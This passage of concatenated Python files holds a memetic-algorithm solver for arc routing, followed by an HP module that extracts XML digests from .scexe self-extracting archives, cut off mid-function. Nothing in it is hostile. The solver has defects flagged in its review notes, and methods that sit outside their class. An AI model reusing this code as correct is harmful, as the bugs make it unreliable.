        NOTE(review): each candidate is a deepcopy of the ORIGINAL gene, so
        passes after the first re-evaluate the same neighborhood.
        """
        before=1000000
        best_q=1000000
        best_gene=gene
        time_out=False
        while True:
            if time_out:
                break
            for i in range(len(gene)):
                if time_out:
                    break
                if len(gene[i])>1:
                    for j in range(len(gene[i])):
                        if time_out:
                            break
                        for k in range(len(gene[i])-1):
                            if time.time()-start>float(termin_time)-0.5:
                                time_out=True
                            if time_out:
                                break
                            copy_gene=copy.deepcopy(gene)
                            self.single_insertion(copy_gene,1,i,j,k)
                            q=self.get_q(copy_gene)
                            if q<best_q:
                                best_gene=copy_gene
                                best_q=q
            if best_q==before:
                break
            else:
                before=best_q
        return best_gene
    def double_local_search(self,gene):
        """Hill-climb with double_insertion (pair) moves, p=1, until a full
        pass yields no improvement or the global deadline is hit.

        Reads the module-level globals `start` and `termin_time`; stops 0.5 s
        before the termination time.
        """
        before=1000000
        best_q=1000000
        best_gene=gene
        time_out=False
        while True:
            if time_out:
                break
            for i in range(len(gene)):
                if time_out:
                    break
                if len(gene[i])>2:
                    for j in range(len(gene[i])-1):
                        if time_out:
                            break
                        for k in range(len(gene[i])-2):
                            if time.time()-start>float(termin_time)-0.5:
                                time_out=True
                            if time_out:
                                break
                            copy_gene=copy.deepcopy(gene)
                            self.double_insertion(copy_gene,1,i,j,k)
                            q=self.get_q(copy_gene)
                            if q<best_q:
                                best_gene=copy_gene
                                best_q=q
            if best_q==before:
                break
            else:
                before=best_q
        return best_gene
    def swap_local_search(self,gene):
        """Hill-climb with intra-route swap moves until a full pass yields no
        improvement or the global deadline is hit.

        Reads the module-level globals `start` and `termin_time`; stops 0.5 s
        before the termination time.
        """
        before=1000000
        best_q=1000000
        best_gene=gene
        time_out=False
        while True:
            if time_out:
                break
            for i in range(len(gene)):
                if time_out:
                    break
                if len(gene[i])>2:
                    for j in range(len(gene[i])):
                        if time_out:
                            break
                        for k in range(len(gene[i])):
                            if k!=j:
                                if time.time()-start>float(termin_time)-0.5:
                                    time_out=True
                                if time_out:
                                    break
                                copy_gene=copy.deepcopy(gene)
                                self.swap(copy_gene,i,j,k)
                                q=self.get_q(copy_gene)
                                if q<best_q:
                                    best_gene=copy_gene
                                    best_q=q
            if best_q==before:
                break
            else:
                before=best_q
        return best_gene
    def Ulusoy_split(self,ordered_list):
        """Split an ordered task sequence into capacity-feasible routes via
        the Ulusoy shortest-path DP: V[j] is the best cost of serving the
        first j tasks, P[j] the start index of the last route in that optimum.

        NOTE(review): `cost` is assigned (not accumulated) per extension; the
        else-branch formula looks like an incremental delta (it subtracts the
        previous return leg), which suggests this may have been meant as
        `cost +=` - confirm against the intended algorithm.

        Returns:
            list[list[int]]: the routes (emitted from last to first).
        """
        V=[0 for i in range(len(ordered_list)+1)]
        P=[0 for i in range(len(ordered_list)+1)]
        length=len(ordered_list)
        for i in range(1,length+1):
            V[i]=1000000000
        for t in range(1,length+1):
            i=t-1
            j=i
            load=0
            cost=0
            before_task=None
            while j<length:
                task=self.task_dic[ordered_list[j]]
                load+=self.demand_dic[task]
                if i==j:
                    # Single-task route: depot -> task -> depot.
                    cost=self._all_distance[self._depot][task[0]]+self.cost_dic[task]+self._all_distance[self._depot][task[1]]
                else:
                    cost=self._all_distance[before_task[1]][task[0]]+self.cost_dic[task]+self._all_distance[self._depot][task[1]]-self._all_distance[self._depot][before_task[1]]
                if load<=self._capacity:
                    v_new=V[t-1]+cost
                    if v_new<V[j+1]:
                        V[j+1]=v_new
                        P[j+1]=t-1
                    before_task=task
                    j+=1
                else:
                    # Capacity exceeded: no further extension from this start.
                    break
        # Walk the predecessor chain backwards to materialize the routes.
        output=[]
        j=length
        ptr=P[j]
        while ptr>0:
            route=[]
            for k in range(ptr,j):
                route.append(ordered_list[k])
            output.append(route)
            j=ptr
            ptr=P[j]
        route=[]
        for k in range(0,j):
            route.append(ordered_list[k])
        output.append(route)
        return output
def flatten(self,gene):
    """Concatenate the routes of *gene* into one flat list of task ids."""
    return [task for route in gene for task in route]
def merge(self,gene,indices):
    """Partition the routes of *gene* by position.

    :param gene: list of routes.
    :param indices: iterable of route positions to select.
    :return: ``(selected, remaining)`` -- routes whose position is in
        *indices*, and all other routes, both preserving original order.

    Note: the second parameter used to be named ``list``, shadowing the
    builtin; all call sites pass it positionally, so renaming is safe.
    Membership is now tested against a set (O(1)) instead of scanning a
    list per route.
    """
    wanted=set(indices)
    selected=[]
    remaining=[]
    for pos,route in enumerate(gene):
        if pos in wanted:
            selected.append(route)
        else:
            remaining.append(route)
    return selected,remaining
def MS_local_search(self,gene):
    """Merge-Split local search: re-split pairs of merged routes.

    Merges two routes out of ``gene``, re-orders the merged tasks with the
    five path-scanning heuristics (PS1..PS5), re-splits each ordering with
    Ulusoy's procedure, and keeps the cheapest result; untouched routes are
    appended back at the end.

    NOTE(review): several things here look unintended -- confirm before
    relying on them:
      * the inner ``for i in range(5)`` rebinds the outer route index ``i``,
        so the merged pair is effectively (0..4, j) rather than (i, j);
      * ``if counter>100: pass`` does nothing (probably meant ``break``);
      * calls go through the module-level ``graph`` instead of ``self``;
      * if no candidate beats ``min_score``, ``min_split``/``min_left``
        stay ``None`` and the final loop raises.
    """
    min_split=None
    min_left=None
    min_score=10000000000
    counter=0
    for i in range(len(gene)):
        for j in range(i+1,len(gene)):
            counter+=1
            if counter>100:
                pass
            else:
                for i in range(5):
                    random_select,left=graph.merge(gene,[i,j])
                    split1=graph.Ulusoy_split(graph.PS1(copy.deepcopy(graph.flatten(random_select))))
                    split2=graph.Ulusoy_split(graph.PS2(copy.deepcopy(graph.flatten(random_select))))
                    split3=graph.Ulusoy_split(graph.PS3(copy.deepcopy(graph.flatten(random_select))))
                    split4=graph.Ulusoy_split(graph.PS4(copy.deepcopy(graph.flatten(random_select))))
                    split5=graph.Ulusoy_split(graph.PS5(copy.deepcopy(graph.flatten(random_select))))
                    score1=self.get_q(split1)
                    score2=self.get_q(split2)
                    score3=self.get_q(split3)
                    score4=self.get_q(split4)
                    score5=self.get_q(split5)
                    if score1<min_score:
                        min_score=score1
                        min_split=split1
                        min_left=left
                    if score2<min_score:
                        min_score=score2
                        min_split=split2
                        min_left=left
                    if score3<min_score:
                        min_score=score3
                        min_split=split3
                        min_left=left
                    if score4<min_score:
                        min_score=score4
                        min_split=split4
                        min_left=left
                    if score5<min_score:
                        min_score=score5
                        min_split=split5
                        min_left=left
    # Re-attach the routes that were not part of the merged selection.
    for i in min_left:
        min_split.append(i)
    return min_split
def best_BIH(self):
    """Repeated best-insertion construction within the global time budget.

    Generates genes with ``self.get_gene2`` until ``termin_time`` expires or
    100 consecutive duplicates occur, ranks them in a priority queue by
    quality (``Individual`` orders by q), then emits the best via
    ``self.gene_output``.

    NOTE(review): if the deadline has already passed on entry, the queue is
    empty and ``population.get()`` blocks forever -- confirm callers always
    leave budget.
    """
    population=queue.PriorityQueue()
    gene_set=set()                 # dedup set of genes seen (as tuples)
    counter=0                      # number of distinct genes generated
    misstime=0                     # consecutive duplicate draws
    while time.time()-start<float(termin_time):
        copy_gene=self.get_gene2()
        tuple_gene=self.list_2_tuple(copy_gene)
        if tuple_gene not in gene_set:
            counter+=1
            gene_set.add(tuple_gene)
            new_individual=Individual(copy_gene, self.get_q(copy_gene))
            population.put_nowait(new_individual)
            misstime=0
        else:
            misstime+=1
            if misstime>100:       # heuristic saturation: stop early
                break
    best=population.get()
    self.gene_output(best.gene)
def cross_over(self,gene1,gene2):
    """Route-level crossover: splice one route of each parent.

    Picks a random route R1 from ``gene1`` and R2 from ``gene2`` (re-drawn
    until each has at least two tasks), builds a child route from a prefix
    of R1 plus a suffix of R2, removes tasks that were not in R1, then
    greedily best-inserts the tasks of R1 that went missing (trying both
    orientations of each task at every insertion point, breaking ties at
    random).  The child route replaces R1 in ``gene1``.

    :param gene1: first parent; MUTATED in place and returned.
    :param gene2: second parent; read-only.
    :return: ``gene1`` with the crossed-over route.

    NOTE(review): if a parent has no route with >=2 tasks, the re-draw
    ``while`` loops never terminate -- confirm inputs guarantee one.
    """
    k1=random.randint(0,len(gene1)-1)
    k2=random.randint(0,len(gene2)-1)
    # print(k1)
    # print(k2)
    R1=gene1[k1]
    R2=gene2[k2]
    # print(f'R1 is {R1}')
    # print(f'R2 is {R2}')
    while len(R1)<2:
        k1=random.randint(0,len(gene1)-1)
        R1=gene1[k1]
    while len(R2)<2:
        k2=random.randint(0,len(gene2)-1)
        R2=gene2[k2]
    s1=random.randint(1,len(R1)-1)
    s2=random.randint(1,len(R2)-1)
    R11=R1[:s1]                      # prefix taken from parent 1's route
    R22=R2[s2:]                      # suffix taken from parent 2's route
    new=R11+R22
    miss=[]                          # tasks of R1 lost by the splice
    dup=[]                           # spliced-in tasks that don't belong to R1
    for i in new:
        if i not in R1:
            dup.append(i)
    for i in R1:
        if i not in new:
            miss.append(i)
    for i in dup:
        new.remove(i)
    # Greedy best-insertion of every missing task, trying both orientations
    # ((j, True) = forward, (j, False) = reversed) at every position.
    for i in miss:
        task_k=self.task_dic[i]
        min_distance=1000000000
        min_list=[]                  # tied best (position, forward?) pairs
        for j in range(len(new)):
            insert_index=j
            if insert_index==0:
                # Insert at the head: depot -> task -> first task of `new`.
                after=self.task_dic[new[insert_index]]
                disx=self._all_distance[self._depot][task_k[0]]+self.cost_dic[task_k]+self._all_distance[task_k[1]][after[0]]
                disy=self._all_distance[self._depot][task_k[1]]+self.cost_dic[task_k]+self._all_distance[task_k[0]][after[0]]
                if disx<min_distance :
                    min_list=[]
                    min_list.append((j,True))
                    min_distance=disx
                elif disx==min_distance:
                    min_list.append((j,True))
                    min_distance=disx
                if disy<min_distance:
                    min_list=[]
                    min_list.append((j,False))
                    min_distance=disy
                elif disy==min_distance:
                    min_list.append((j,False))
                    min_distance=disy
            elif insert_index==(len(new)-1):
                # Insert before the last slot: previous task -> task -> depot.
                before=self.task_dic[new[insert_index]]
                disx=self._all_distance[before[1]][task_k[0]]+self.cost_dic[task_k]+self._all_distance[task_k[1]][self._depot]
                disy=self._all_distance[before[1]][task_k[1]]+self.cost_dic[task_k]+self._all_distance[task_k[0]][self._depot]
                if disx<min_distance :
                    min_list=[]
                    min_list.append((j,True))
                    min_distance=disx
                elif disx==min_distance:
                    min_list.append((j,True))
                    min_distance=disx
                if disy<min_distance:
                    min_list=[]
                    min_list.append((j,False))
                    min_distance=disy
                elif disy==min_distance:
                    min_list.append((j,False))
                    min_distance=disy
            else:
                # Interior insertion between new[j-1] and new[j].
                before=self.task_dic[new[insert_index-1]]
                after=self.task_dic[new[insert_index]]
                disx=self._all_distance[before[1]][task_k[0]]+self.cost_dic[task_k]+self._all_distance[task_k[1]][after[0]]
                disy=self._all_distance[before[1]][task_k[1]]+self.cost_dic[task_k]+self._all_distance[task_k[0]][after[0]]
                if disx<min_distance :
                    min_list=[]
                    min_list.append((j,True))
                    min_distance=disx
                elif disx==min_distance:
                    min_list.append((j,True))
                    min_distance=disx
                if disy<min_distance:
                    min_list=[]
                    min_list.append((j,False))
                    min_distance=disy
                elif disy==min_distance:
                    min_list.append((j,False))
                    min_distance=disy
        # Random tie-break among equally good insertions.
        k=random.randint(0,len(min_list)-1)
        min_index=min_list[k][0]
        min_s=min_list[k][1]
        if not min_s:
            task_k=(task_k[1],task_k[0])   # reversed orientation chosen
        new.insert(min_index,self.id_dic[(task_k[0],task_k[1])])
    gene1.pop(k1)
    gene1.insert(k1,new)
    return gene1
def PS(self,unordered_list):
    """Randomized path-scanning ordering of the given tasks.

    Builds routes by repeatedly serving a random one of the tasks whose
    nearer endpoint is closest to the current position and still fits the
    vehicle capacity; routes are closed when nothing fits or the walk
    returns to the depot.  Returns the flattened task order (routes are
    re-split later by ``Ulusoy_split``).

    NOTE(review): three things here look suspicious -- confirm intent:
      * when ``min_list`` is empty the loop ``break``s, leaving every
        remaining task unrouted (a ``continue`` would start a new route);
      * ``now=min_task[1]`` runs even when the task was appended in the
        reversed orientation, where the walk actually ends at min_task[0];
      * the sort key goes through the module-level ``graph`` instead of
        ``self``.
    """
    tasklist=[]
    for i in unordered_list:
        task=self.task_dic[i]
        s=int(task[0])
        t=int(task[1])
        c=self.cost_dic[task]
        d=self.demand_dic[task]
        if d!=0:                      # zero-demand tasks need not be served
            tasklist.append((s,t,c,d,self._depot))
    route=[]
    gene=[]
    now=self._depot
    task_sum=0                        # load of the route under construction
    while len(tasklist)>0:
        # Nearest-endpoint-first ordering from the current position.
        tasklist.sort(key = lambda x:min(graph._all_distance[now][x[0]],graph._all_distance[now][x[1]]))
        min_list=[]
        min_dis=min(self._all_distance[now][tasklist[0][0]],self._all_distance[now][tasklist[0][1]])
        for i in tasklist:
            if min(self._all_distance[now][i[0]],self._all_distance[now][i[1]])==min_dis and i[3]+task_sum<self._capacity :
                min_list.append(i)
        if min_list==[]:
            task_sum=0
            gene.append(route)
            route=[]
            now=self._depot
            break
        np.random.shuffle(min_list)   # random tie-break among nearest tasks
        min_task=min_list[0]
        tasklist.remove(min_task)
        task_sum+=min_task[3]
        if self._all_distance[now][min_task[0]]<self._all_distance[now][min_task[1]]:
            route.append(self.id_dic[(min_task[0],min_task[1])])
        else:
            route.append(self.id_dic[(min_task[1],min_task[0])])
        now=min_task[1]
        if now==self._depot:          # walked back to the depot: close route
            task_sum=0
            gene.append(route)
            route=[]
    gene.append(route)
    task_sum=0
    now=self._depot
    return self.flatten(gene)
def _ps_orient(self,entry,candidate):
    """Return a deep copy of candidate[entry[0]], reversed if entry[1] is False."""
    task=copy.deepcopy(candidate[entry[0]])
    if not entry[1]:
        task.s,task.t=task.t,task.s
    return task

def _ps_pick(self,oriented,score,prefer_max):
    """Index of the first oriented task with the max (or min) score.

    Reproduces the original tie-break: strict comparison, so the earliest
    candidate wins ties; sentinels match the originals (-1000000 / 1000000).
    """
    k=0
    if prefer_max:
        best=-1000000
        for i,task in enumerate(oriented):
            val=score(task)
            if val>best:
                k=i
                best=val
    else:
        best=1000000
        for i,task in enumerate(oriented):
            val=score(task)
            if val<best:
                k=i
                best=val
    return k

def _ps_construct(self,unordered_list,pick_rule):
    """Shared path-scanning construction used by PS1..PS5.

    Pops the lowest-priority tasks that still fit the vehicle from a
    priority queue, shortlists those whose endpoint is nearest to the
    current position ((index, True)=serve s->t, (index, False)=serve t->s),
    lets ``pick_rule(oriented_tasks, current_load)`` break the tie, and
    appends the chosen task to the current route.  A route is closed when
    nothing fits.  Returns the flattened task order.

    This consolidates five previously duplicated ~80-line method bodies
    that differed only in the tie-break rule; the construction logic is
    unchanged.
    """
    tasklist=queue.PriorityQueue()
    for tid in unordered_list:
        task=self.task_dic[tid]
        d=self.demand_dic[task]
        if d!=0:   # zero-demand tasks need not be served
            tasklist.put_nowait(Edge(int(task[0]),int(task[1]),self.cost_dic[task],d))
    candidate=[]
    route=[]
    gene=[]
    now=self._depot
    task_sum=0
    while not tasklist.empty():
        # Drain tasks (in queue-priority order) that still fit the vehicle;
        # stop at the first one that does not, putting it back.
        while not tasklist.empty():
            least=tasklist.get()
            if least.d+task_sum<=self._capacity:
                candidate.append(least)
            else:
                tasklist.put_nowait(least)
                break
        if len(candidate)==0:
            # Nothing fits: close the route and restart from the depot.
            task_sum=0
            gene.append(route)
            route=[]
            now=self._depot
        else:
            # Shortlist candidates whose nearer endpoint ties for the
            # minimum distance from the current position.
            min_distance=1000000000
            min_list=[]
            for i in range(len(candidate)):
                cand=candidate[i]
                disx=self._all_distance[cand.s][now]
                disy=self._all_distance[cand.t][now]
                if disx<min_distance:
                    min_list=[(i,True)]
                    min_distance=disx
                elif disx==min_distance:
                    min_list.append((i,True))
                if disy<min_distance:
                    min_list=[(i,False)]
                    min_distance=disy
                elif disy==min_distance:
                    min_list.append((i,False))
            # Let the heuristic-specific rule break the tie.
            oriented=[self._ps_orient(entry,candidate) for entry in min_list]
            k=pick_rule(oriented,task_sum)
            min_index,forward=min_list[k]
            min_task=candidate.pop(min_index)
            if not forward:
                min_task.s,min_task.t=min_task.t,min_task.s
            # Unused candidates go back into the pool.
            for c in candidate:
                tasklist.put_nowait(c)
            candidate=[]
            task_sum+=min_task.d
            route.append(self.id_dic[(min_task.s,min_task.t)])
            now=min_task.t
    gene.append(route)
    return self.flatten(gene)

def PS1(self,unordered_list):
    """Path-scanning; ties broken by MAXIMIZING distance from the depot."""
    return self._ps_construct(unordered_list,
        lambda oriented,load:self._ps_pick(oriented,lambda t:self._all_distance[self._depot][t.s],True))

def PS2(self,unordered_list):
    """Path-scanning; ties broken by MINIMIZING distance from the depot."""
    return self._ps_construct(unordered_list,
        lambda oriented,load:self._ps_pick(oriented,lambda t:self._all_distance[self._depot][t.s],False))

def PS3(self,unordered_list):
    """Path-scanning; ties broken by MAXIMIZING the demand/cost ratio."""
    return self._ps_construct(unordered_list,
        lambda oriented,load:self._ps_pick(oriented,lambda t:t.d/t.c,True))

def PS4(self,unordered_list):
    """Path-scanning; ties broken by MINIMIZING the demand/cost ratio."""
    return self._ps_construct(unordered_list,
        lambda oriented,load:self._ps_pick(oriented,lambda t:t.d/t.c,False))

def PS5(self,unordered_list):
    """Path-scanning; when the vehicle is less than half full, prefer tasks
    FAR from the depot, otherwise tasks NEAR the depot."""
    return self._ps_construct(unordered_list,
        lambda oriented,load:self._ps_pick(oriented,lambda t:self._all_distance[self._depot][t.s],load<self._capacity/2))
def memetic_evolution(self,psize):
    """Memetic algorithm: GA with probabilistic local search.

    Seeds up to ``psize`` distinct genes with ``self.get_gene`` (giving up
    after 50 duplicate draws per slot), then until the module-level time
    budget (``start``/``termin_time``) expires: performs 6*psize crossovers
    per generation, applies one of three local searches (plus Merge-Split)
    with probability 0.2, and keeps the best ``psize`` individuals.  Emits
    and returns the best gene found.

    :param psize: requested population size (may shrink if seeding stalls).
    """
    pop=[]
    gene_set=set()       # all genes ever seen, as hashable tuples
    q_dict={}            # gene tuple -> cached quality
    while len(pop)<psize:
        trial=0
        copy_gene=None
        tuple_gene=None
        while True:
            trial+=1
            copy_gene=self.get_gene()
            tuple_gene=self.list_2_tuple(copy_gene)
            if trial==50 or tuple_gene not in gene_set:
                break
        if tuple_gene in gene_set:
            break        # 50 duplicates in a row: stop seeding early
        pop.append(copy_gene)
        gene_set.add(tuple_gene)
        q_dict[tuple_gene]=self.get_q(copy_gene)
    psize=len(pop)       # actual population size after seeding
    while time.time()-start<float(termin_time):
        popt=copy.deepcopy(pop)
        sett=copy.deepcopy(gene_set)
        for i in range(6*psize):
            if time.time()-start>float(termin_time):
                break
            # Pick two distinct parents uniformly at random.
            s1=random.randint(0,psize-1)
            s2=random.randint(0,psize-1)
            while s1==s2:
                s2=random.randint(0,psize-1)
            S1=pop[s1]
            S2=pop[s2]
            Sx_gene=self.cross_over(copy.deepcopy(S1),copy.deepcopy(S2))
            # print(f's1 {self.get_q(S1)} s2 {self.get_q(S2)} s3 {self.get_q(Sx_gene)}')
            r= random.random()
            if r<0.2:
                # Local-search branch: one of three operators, then Merge-Split.
                rr=random.random()
                Sls_gene=None
                if rr<0.33:
                    Sls_gene=self.single_local_search(Sx_gene)
                elif rr<0.66:
                    Sls_gene=self.double_local_search(Sx_gene)
                else:
                    Sls_gene=self.swap_local_search(Sx_gene)
                Sls_tuple=self.list_2_tuple(Sls_gene)
                Sx_tuple=self.list_2_tuple(Sx_gene)
                q_dict[Sls_tuple]=self.get_q(Sls_gene)
                q_dict[Sx_tuple]=self.get_q(Sx_gene)
                ms_gene=self.MS_local_search(Sls_gene)
                ms_q=self.get_q(ms_gene)
                q_dict[self.list_2_tuple(ms_gene)]=ms_q
                if ms_q<q_dict[Sls_tuple]:
                    # NOTE(review): Sls_gene is replaced but Sls_tuple still
                    # refers to the pre-Merge-Split gene -- confirm intended.
                    Sls_gene=ms_gene
                if Sls_tuple not in sett:
                    popt.append(Sls_gene)
                    sett.add(Sls_tuple)
                elif Sx_tuple not in sett:
                    popt.append(Sx_gene)
                    sett.add(Sx_tuple)
            else:
                Sx_tuple=self.list_2_tuple(Sx_gene)
                if Sx_tuple not in sett:
                    popt.append(Sx_gene)
                    sett.add(Sx_tuple)
                    q_dict[Sx_tuple]=self.get_q(Sx_gene)
        # Elitist survivor selection: keep the best psize individuals.
        rank=queue.PriorityQueue()
        for i in popt:
            rank.put_nowait(Individual(i,q_dict[self.list_2_tuple(i)]))
        pop=[]
        for i in range(psize):
            pop.append(rank.get().gene)
    # Report the best individual of the final population.
    min_gene=None
    min_value=1000000000000
    for i in pop:
        q=q_dict[self.list_2_tuple(i)]
        if q<min_value:
            min_gene=i
            min_value=q
    self.gene_output(min_gene)
    return min_gene
def memetic_evolution2(self,psize):
    """Memetic algorithm variant driven by a shared priority queue.

    First half of the time budget: seed the population queue with distinct
    genes from ``get_gene2``/``get_gene`` (coin flip).  Second half: each
    generation pops the best ``psize`` individuals, crosses two random ones,
    optionally applies a local search and Merge-Split (probability 0.2),
    pushes every new distinct gene back, and re-inserts the popped elite.
    Emits and returns the best gene.
    """
    population=queue.PriorityQueue()
    gene_set=set()       # dedup set of genes seen (as tuples)
    counter=0            # number of distinct genes generated
    while time.time()-start<float(termin_time)/2:
        r=np.random.rand()
        if r>0.5:
            copy_gene=self.get_gene2()
        else:
            copy_gene=self.get_gene()
        tuple_gene=self.list_2_tuple(copy_gene)
        if tuple_gene not in gene_set:
            counter+=1
            gene_set.add(tuple_gene)
            new_individual=Individual(copy_gene, self.get_q(copy_gene))
            population.put_nowait(new_individual)
    g=0                  # generation counter
    while time.time()-start<float(termin_time):
        g+=1
        # Pop the current elite of size psize.
        poplist=[]
        for i in range(psize):
            poplist.append(population.get())
        # Two distinct random parents from the elite.
        s1=random.randint(0,psize-1)
        s2=random.randint(0,psize-1)
        while s1==s2:
            s2=random.randint(0,psize-1)
        S1=poplist[s1]
        S2=poplist[s2]
        Sx_gene=self.cross_over(copy.deepcopy(S1.gene),copy.deepcopy(S2.gene))
        # print(f's1 {self.get_q(S1.gene)} s2 {self.get_q(S2.gene)} s3 {self.get_q(Sx_gene)}')
        tuple_Sx=self.list_2_tuple(Sx_gene)
        if tuple_Sx not in gene_set:
            counter+=1
            gene_set.add(tuple_Sx)
            Sx=Individual(Sx_gene, self.get_q(Sx_gene))
            population.put_nowait(Sx)
        r= random.random()
        if r<0.2:
            # Local-search branch, then Merge-Split refinement.
            rp= random.random()
            Sls_gene=None
            if rp <0.3:
                Sls_gene=self.single_local_search(Sx_gene)
            elif rp<0.6:
                Sls_gene=self.double_local_search(Sx_gene)
            else:
                Sls_gene=self.swap_local_search(Sx_gene)
            tuple_Sls=self.list_2_tuple(Sls_gene)
            if tuple_Sls not in gene_set:
                counter+=1
                gene_set.add(tuple_Sls)
                Sls=Individual(Sls_gene, self.get_q(Sls_gene))
                population.put_nowait(Sls)
            MS_Sls_gene=self.MS_local_search(Sls_gene)
            tuple_Sls=self.list_2_tuple(MS_Sls_gene)
            # print(f's1 {self.get_q(S1.gene)} s2 {self.get_q(S2.gene)} s3 {self.get_q(Sx_gene)} Sls {self.get_q(Sls_gene)} Ms {self.get_q(MS_Sls_gene)}')
            if tuple_Sls not in gene_set:
                counter+=1
                gene_set.add(tuple_Sls)
                Sls=Individual(MS_Sls_gene, self.get_q(MS_Sls_gene))
                population.put_nowait(Sls)
        # Put the popped elite back into the queue.
        for i in range(psize):
            population.put_nowait(poplist[i])
    best=population.get()
    self.gene_output(best.gene)
    return best.gene
def mul_BIH(self,population):
    """Worker entry point for the multi-process best-insertion search.

    Keeps generating genes with ``self.get_gene2`` until the shared time
    budget (module-level ``start``/``termin_time``) expires or 100
    consecutive duplicate draws occur, pushing each distinct gene onto
    ``population`` (a multiprocessing queue) as an ``Individual``.

    :param population: cross-process queue collecting candidate solutions.
    """
    gene_set=set()       # dedup set local to this worker
    counter=0            # distinct genes produced by this worker
    misstime=0           # consecutive duplicate draws
    while time.time()-start<float(termin_time):
        copy_gene=self.get_gene2()
        tuple_gene=self.list_2_tuple(copy_gene)
        if tuple_gene not in gene_set:
            counter+=1
            gene_set.add(tuple_gene)
            new_individual=Individual(copy_gene, self.get_q(copy_gene))
            population.put(new_individual)
            misstime=0
        else:
            misstime+=1
            if misstime>100:   # saturated: stop this worker early
                break
    # best=population.get()
    # self.gene_output(best.gene)
# Module-level solver instance; also used by the worker processes below.
graph=Graph(vertices,depot,required,non_required,vehicles,capacity,total_cost,edge_list)

if __name__=='__main__':
    # Fan out 8 worker processes, each running the best-insertion heuristic
    # and pushing its Individuals onto the shared queue.
    population=Queue()
    processes=[Process(target=graph.mul_BIH,args=(population,)) for _ in range(8)]
    for p in processes:
        p.start()
    for p in processes:
        p.join()
    # BUG FIX: results were previously read with `queue.get()` -- `queue` is
    # the stdlib MODULE, which has no get(); the Individuals live in the
    # shared `population` queue.
    # NOTE(review): each worker pushes MANY individuals, so draining one
    # item per process only samples the queue; joining before draining can
    # also deadlock if the queue's pipe buffer fills -- confirm workloads
    # stay small or drain before join.
    results=[population.get() for _ in processes]
    results.sort()
    graph.gene_output(results[0].gene)
smartcomponent.py | #####################################################
#
# smartcomponent.py
#
# Copyright 2007 Hewlett-Packard Development Company, L.P.
#
# Hewlett-Packard and the Hewlett-Packard logo are trademarks of
# Hewlett-Packard Development Company, L.P. in the U.S. and/or other countries.
#
# Confidential computer software. Valid license from Hewlett-Packard required
# for possession, use or copying. Consistent with FAR 12.211 and 12.212,
# Commercial Computer Software, Computer Software Documentation, and Technical
# Data for Commercial Items are licensed to the U.S. Government under
# vendor's standard commercial license.
#
# Author:
# James Abendroth
#
# Description:
# Manages Smart Component objects for Breckenridge.
#
#####################################################
import os
import tarfile
import tempfile
from xml.dom.minidom import parse
from threading import Thread
import logging
log = logging.getLogger(__name__)
SC_SHARE_PATH='static/sc_share'
class SmartComponent:
    """One discovered HP Smart Component package (.scexe).

    Attributes are filled in by SmartComponentManager.parse_digest:
    ``version`` and ``name`` from the package's XML digest, ``filename``
    from the file on disk.
    """
    def __init__(self):
        self.version = "Unknown"
        self.name = "Unknown Component"
        self.filename = ""

    def __repr__(self):
        return str(self.__dict__)

    def json(self):
        """Serialize the component's attributes as a JSON object string."""
        # BUG FIX: the module never imports json, so this method raised
        # NameError; import locally to keep the module header untouched.
        import json
        return json.dumps(self.__dict__)
class SmartComponentManager:
    """Discovers, parses and tracks Smart Component (.scexe) packages under
    SC_SHARE_PATH.

    NOTE(review): paths are joined with a hard-coded '\\' separator, so the
    class is Windows-only as written (os.path.join would be portable), and
    the binary-read loops compare bytes against "" -- Python 2 semantics;
    confirm the runtime before porting.
    """
    def __init__(self):
        # Discovered SmartComponent objects, in discovery order.
        self.components = []
        # Absolute path of the share directory holding the .scexe files.
        self.path = os.path.abspath(SC_SHARE_PATH)
        log.debug("Initializing SmartComponentManager")

    def get_sc_file_list(self):
        # Returns on the first os.walk() entry, so only the top level of the
        # share directory is listed; returns None if the directory is absent.
        for root, directories, files in os.walk(self.path):
            return files

    def delete_component(self, sc_filename):
        # Remove the component file and drop the matching tracked entry.
        # NOTE(review): mutates self.components while iterating (benign with
        # at most one match) and swallows every error via the bare except.
        sc_path = self.path + '\\' + sc_filename
        try:
            os.remove(sc_path)
            for component in self.components:
                if component.filename == sc_filename:
                    self.components.remove(component)
        except:
            pass

    def discover_components(self):
        # Kick off discovery in the background; daemon thread so it never
        # blocks interpreter shutdown.
        t = Thread(target=self.do_discover_components)
        t.daemon = True
        t.start()

    def do_discover_components(self):
        # Scan the share directory and register every .scexe file found.
        files = self.get_sc_file_list()
        if files:
            for file in files:
                if file.lower().endswith('.scexe') :
                    log.debug("Discovered component %s", file)
                    self.add_component(file)

    def add_component(self, filename):
        """Register one .scexe file: extract its XML digest, parse version
        and name into a SmartComponent, and track it.  Returns False if the
        file is already tracked."""
        log.debug("Adding component %s", filename)
        if filename in [c.filename for c in self.components ] :
            log.error("Component %s already added", filename)
            return False
        component = SmartComponent()
        component.filename = filename
        digest_filename = self.extract_component_digest(filename)
        if digest_filename != "":
            self.parse_digest(digest_filename, component)
            # Remove the digest file.
            try:
                os.remove(self.path + '\\' + digest_filename)
            except:
                log.exception("Error removing digest file %s", digest_filename)
                pass
        self.components.append(component)

    # Each smart component should have an XML file inside. We'll use
    # tar to extract that file and obtain information about the component.
    # This function will return the filename of the xml file after it
    # has been extracted from the archive.
    def extract_component_digest(self, sc_filename):
        # A .scexe is a shell-style self-extractor: a text header containing
        # "_SKIP=<line>" followed by a tar archive starting at that line.
        # The first step is to find the line where the tarfile starts.
        sc_path = self.path + '\\' + sc_filename
        sc_file = open(sc_path, "rb")
        line_offset = -1
        while True:
            buf = sc_file.read(1024)
            # NOTE(review): under Python 3 bytes never equal "" and
            # bytes.find("_SKIP=") raises TypeError -- this loop assumes
            # Python 2 string semantics.
            if buf == "":
                break
            skip_idx = buf.find("_SKIP=")
            if (skip_idx != -1):
                buf = buf[(skip_idx+6):]
                newline = buf.find('\n')
                line_offset = buf[0:newline]
                break
        # We didn't find the line offset. We can't go any further.
        if line_offset == -1:
            sc_file.close()
            log.error("Unable to find tar offset in %s", sc_filename)
            return ""
        line_offset = int(line_offset)-1
        sc_file.seek(0)
        log.debug("tar file in %s at offset %d", sc_filename, line_offset)
        # Now that we have our line offset, move to the correct position in the file.
        for line in range(0, line_offset):
            sc_file.readline()
        # Copy the remainder of the self-extractor into a temp file: that is
        # the embedded tar archive.
        tar_file = tempfile.mkstemp(dir=self.path)
        while True:
            buf = sc_file.read(1024)
            if buf == "":
                break
            os.write(tar_file[0], buf)
        sc_file.close()
        os.close(tar_file[0])
        # Now we should have a good tarfile to extract the digest.
        digest_name = ""
        try:
            tf = tarfile.open(tar_file[1], 'r')
            for filename in tf.getnames() :
                # The digest XML is named after the component itself.
                if filename.lower() == sc_filename.lower().replace('.scexe', '.xml') :
